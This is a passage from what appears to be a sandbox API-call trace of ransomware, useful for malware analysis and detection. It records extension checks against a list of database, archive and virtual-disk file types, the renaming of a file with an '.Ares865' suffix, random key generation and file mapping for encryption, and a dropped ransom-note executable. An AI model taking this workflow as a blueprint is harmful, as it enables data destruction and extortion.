(lpString="Ares865") returned 7 [0072.629] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0072.629] lstrlenW (lpString=".dll") returned 4 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0072.629] lstrlenW (lpString=".lnk") returned 4 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0072.629] lstrlenW (lpString=".ini") returned 4 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0072.629] lstrlenW (lpString=".sys") returned 4 [0072.629] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0072.629] lstrlenW (lpString="cab1.cab") returned 8 [0072.629] lstrlenW (lpString="bak") returned 3 [0072.629] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0072.629] lstrlenW (lpString="ba_") returned 3 [0072.629] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0072.629] lstrlenW (lpString="dbb") returned 3 [0072.629] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0072.629] lstrlenW (lpString="vmdk") returned 4 [0072.629] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0072.629] lstrlenW (lpString="rar") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0072.630] lstrlenW (lpString="zip") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0072.630] lstrlenW (lpString="tgz") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0072.630] lstrlenW (lpString="vbox") returned 4 [0072.630] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0072.630] lstrlenW (lpString="vdi") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0072.630] lstrlenW (lpString="vhd") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0072.630] lstrlenW (lpString="vhdx") returned 4 [0072.630] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0072.630] lstrlenW (lpString="avhd") returned 4 [0072.630] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0072.630] lstrlenW (lpString="db") returned 2 [0072.630] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0072.630] lstrlenW (lpString="db2") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0072.630] lstrlenW (lpString="db3") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0072.630] lstrlenW (lpString="dbf") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0072.630] lstrlenW (lpString="mdf") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0072.630] lstrlenW (lpString="mdb") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0072.630] lstrlenW (lpString="sql") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0072.630] lstrlenW (lpString="sqlite") returned 6 [0072.630] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0072.630] lstrlenW (lpString="sqlite3") returned 7 [0072.630] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0072.630] lstrlenW (lpString="sqlitedb") returned 8 [0072.630] lstrlenW (lpString="xml") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0072.630] lstrlenW (lpString="$er") returned 3 [0072.630] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0072.631] lstrlenW (lpString="4dd") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0072.631] lstrlenW (lpString="4dl") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0072.631] lstrlenW (lpString="^^^") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0072.631] lstrlenW (lpString="abs") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0072.631] lstrlenW (lpString="abx") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0072.631] lstrlenW (lpString="accdb") returned 5 [0072.631] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0072.631] lstrlenW (lpString="accdc") returned 5 [0072.631] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0072.631] lstrlenW (lpString="accde") returned 5 [0072.631] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0072.631] lstrlenW (lpString="accdr") returned 5 [0072.631] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0072.631] lstrlenW (lpString="accdt") returned 5 [0072.631] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0072.631] lstrlenW (lpString="accdw") returned 5 [0072.631] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0072.631] lstrlenW (lpString="accft") returned 5 [0072.631] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0072.631] lstrlenW (lpString="adb") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0072.631] lstrlenW (lpString="adb") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0072.631] lstrlenW (lpString="ade") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0072.631] lstrlenW (lpString="adf") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0072.631] lstrlenW (lpString="adn") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0072.631] lstrlenW (lpString="adp") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0072.631] lstrlenW (lpString="alf") returned 3 [0072.631] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0072.632] lstrlenW (lpString="ask") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0072.632] lstrlenW (lpString="btr") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0072.632] lstrlenW (lpString="cat") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0072.632] lstrlenW (lpString="cdb") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0072.632] lstrlenW (lpString="ckp") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0072.632] lstrlenW (lpString="cma") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0072.632] lstrlenW (lpString="cpd") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0072.632] lstrlenW (lpString="dacpac") returned 6 [0072.632] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0072.632] lstrlenW (lpString="dad") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0072.632] lstrlenW (lpString="dadiagrams") returned 10 [0072.632] lstrlenW (lpString="daschema") returned 8 [0072.632] lstrlenW (lpString="db-journal") returned 10 [0072.632] lstrlenW (lpString="db-shm") returned 6 [0072.632] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0072.632] lstrlenW (lpString="db-wal") returned 6 [0072.632] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0072.632] lstrlenW (lpString="dbc") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0072.632] lstrlenW (lpString="dbs") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0072.632] lstrlenW (lpString="dbt") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0072.632] lstrlenW (lpString="dbv") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0072.632] lstrlenW (lpString="dbx") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0072.632] lstrlenW (lpString="dcb") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0072.632] lstrlenW (lpString="dct") returned 3 [0072.632] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0072.633] lstrlenW (lpString="dcx") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0072.633] lstrlenW (lpString="ddl") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0072.633] lstrlenW (lpString="dlis") returned 4 [0072.633] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0072.633] lstrlenW (lpString="dp1") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0072.633] lstrlenW (lpString="dqy") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0072.633] lstrlenW (lpString="dsk") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0072.633] lstrlenW (lpString="dsn") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0072.633] lstrlenW (lpString="dtsx") returned 4 [0072.633] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0072.633] lstrlenW (lpString="dxl") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0072.633] lstrlenW (lpString="eco") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0072.633] lstrlenW (lpString="ecx") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0072.633] lstrlenW (lpString="edb") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0072.633] lstrlenW (lpString="epim") returned 4 [0072.633] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0072.633] lstrlenW (lpString="fcd") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0072.633] lstrlenW (lpString="fdb") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0072.633] lstrlenW (lpString="fic") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0072.633] lstrlenW (lpString="flexolibrary") returned 12 [0072.633] lstrlenW (lpString="fm5") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0072.633] lstrlenW (lpString="fmp") returned 3 [0072.633] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0072.633] lstrlenW (lpString="fmp12") returned 5 [0072.633] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0072.634] lstrlenW (lpString="fmpsl") returned 5 [0072.634] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0072.634] lstrlenW (lpString="fol") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0072.634] lstrlenW (lpString="fp3") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0072.634] lstrlenW (lpString="fp4") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0072.634] lstrlenW (lpString="fp5") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0072.634] lstrlenW (lpString="fp7") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0072.634] lstrlenW (lpString="fpt") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0072.634] lstrlenW (lpString="frm") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0072.634] lstrlenW (lpString="gdb") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0072.634] lstrlenW (lpString="gdb") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0072.634] lstrlenW (lpString="grdb") returned 4 [0072.634] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0072.634] lstrlenW (lpString="gwi") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0072.634] lstrlenW (lpString="hdb") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0072.634] lstrlenW (lpString="his") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0072.634] lstrlenW (lpString="ib") returned 2 [0072.634] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0072.634] lstrlenW (lpString="idb") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0072.634] lstrlenW (lpString="ihx") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0072.634] lstrlenW (lpString="itdb") returned 4 [0072.634] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0072.634] lstrlenW (lpString="itw") returned 3 [0072.634] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0072.635] lstrlenW (lpString="jet") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0072.635] lstrlenW (lpString="jtx") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0072.635] lstrlenW (lpString="kdb") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0072.635] lstrlenW (lpString="kexi") returned 4 [0072.635] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0072.635] lstrlenW (lpString="kexic") returned 5 [0072.635] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0072.635] lstrlenW (lpString="kexis") returned 5 [0072.635] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0072.635] lstrlenW (lpString="lgc") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0072.635] lstrlenW (lpString="lwx") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0072.635] lstrlenW (lpString="maf") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0072.635] lstrlenW (lpString="maq") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0072.635] lstrlenW (lpString="mar") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0072.635] lstrlenW (lpString="marshal") returned 7 [0072.635] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0072.635] lstrlenW (lpString="mas") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0072.635] lstrlenW (lpString="mav") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0072.635] lstrlenW (lpString="maw") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0072.635] lstrlenW (lpString="mdbhtml") returned 7 [0072.635] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0072.635] lstrlenW (lpString="mdn") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0072.635] lstrlenW (lpString="mdt") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0072.635] lstrlenW (lpString="mfd") returned 3 [0072.635] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0072.636] lstrlenW (lpString="mpd") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0072.636] lstrlenW (lpString="mrg") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0072.636] lstrlenW (lpString="mud") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0072.636] lstrlenW (lpString="mwb") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0072.636] lstrlenW (lpString="myd") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0072.636] lstrlenW (lpString="ndf") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0072.636] lstrlenW (lpString="nnt") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0072.636] lstrlenW (lpString="nrmlib") returned 6 [0072.636] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0072.636] lstrlenW (lpString="ns2") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0072.636] lstrlenW (lpString="ns3") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0072.636] lstrlenW (lpString="ns4") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0072.636] lstrlenW (lpString="nsf") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0072.636] lstrlenW (lpString="nv") returned 2 [0072.636] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0072.636] lstrlenW (lpString="nv2") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0072.636] lstrlenW (lpString="nwdb") returned 4 [0072.636] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0072.636] lstrlenW (lpString="nyf") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0072.636] lstrlenW (lpString="odb") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0072.636] lstrlenW (lpString="odb") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0072.636] lstrlenW (lpString="oqy") returned 3 [0072.636] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0072.636] lstrlenW (lpString="ora") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0072.637] lstrlenW (lpString="orx") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0072.637] lstrlenW (lpString="owc") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0072.637] lstrlenW (lpString="p96") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0072.637] lstrlenW (lpString="p97") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0072.637] lstrlenW (lpString="pan") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0072.637] lstrlenW (lpString="pdb") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0072.637] lstrlenW (lpString="pdm") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0072.637] lstrlenW (lpString="pnz") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0072.637] lstrlenW (lpString="qry") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0072.637] lstrlenW (lpString="qvd") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0072.637] lstrlenW (lpString="rbf") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0072.637] lstrlenW (lpString="rctd") returned 4 [0072.637] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0072.637] lstrlenW (lpString="rod") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0072.637] lstrlenW (lpString="rodx") returned 4 [0072.637] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0072.637] lstrlenW (lpString="rpd") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0072.637] lstrlenW (lpString="rsd") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0072.637] lstrlenW (lpString="sas7bdat") returned 8 [0072.637] lstrlenW (lpString="sbf") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0072.637] lstrlenW (lpString="scx") returned 3 [0072.637] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0072.637] lstrlenW (lpString="sdb") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0072.638] lstrlenW (lpString="sdc") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0072.638] lstrlenW (lpString="sdf") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0072.638] lstrlenW (lpString="sis") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0072.638] lstrlenW (lpString="spq") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0072.638] lstrlenW (lpString="te") returned 2 [0072.638] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0072.638] lstrlenW (lpString="teacher") returned 7 [0072.638] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0072.638] lstrlenW (lpString="tmd") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0072.638] lstrlenW (lpString="tps") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0072.638] lstrlenW (lpString="trc") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0072.638] lstrlenW (lpString="trc") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0072.638] lstrlenW (lpString="trm") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0072.638] lstrlenW (lpString="udb") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0072.638] lstrlenW (lpString="udl") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0072.638] lstrlenW (lpString="usr") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0072.638] lstrlenW (lpString="v12") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0072.638] lstrlenW (lpString="vis") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0072.638] lstrlenW (lpString="vpd") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0072.638] lstrlenW (lpString="vvv") returned 3 [0072.638] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0072.638] lstrlenW (lpString="wdb") returned 3 [0072.639] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0072.639] lstrlenW (lpString="wmdb") returned 4 [0072.639] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0072.639] lstrlenW (lpString="wrk") returned 3 [0072.639] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0072.639] lstrlenW (lpString="xdb") returned 3 [0072.639] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0072.639] lstrlenW (lpString="xld") returned 3 [0072.639] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0072.639] lstrlenW (lpString="xmlff") returned 5 [0072.639] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0072.639] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865") returned 135 [0072.639] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0072.641] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0072.644] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5881317) returned 1 [0072.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0072.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0072.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0072.644] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0072.645] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0072.645] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0072.645] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x59c0f0, lpName=0x0) returned 0x154 [0072.647] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x19c0f0) returned 0x3450000 [0072.939] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0072.941] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0072.941] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0072.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0072.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0072.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0072.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0072.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0072.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0072.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0072.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0072.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0072.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0072.941] UnmapViewOfFile (lpBaseAddress=0x3450000) returned 1 [0072.956] CloseHandle (hObject=0x154) returned 1 [0072.956] CloseHandle (hObject=0x12c) returned 1 [0072.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0072.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0072.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0072.969] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc8a100, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0072.969] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0072.970] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fed00, 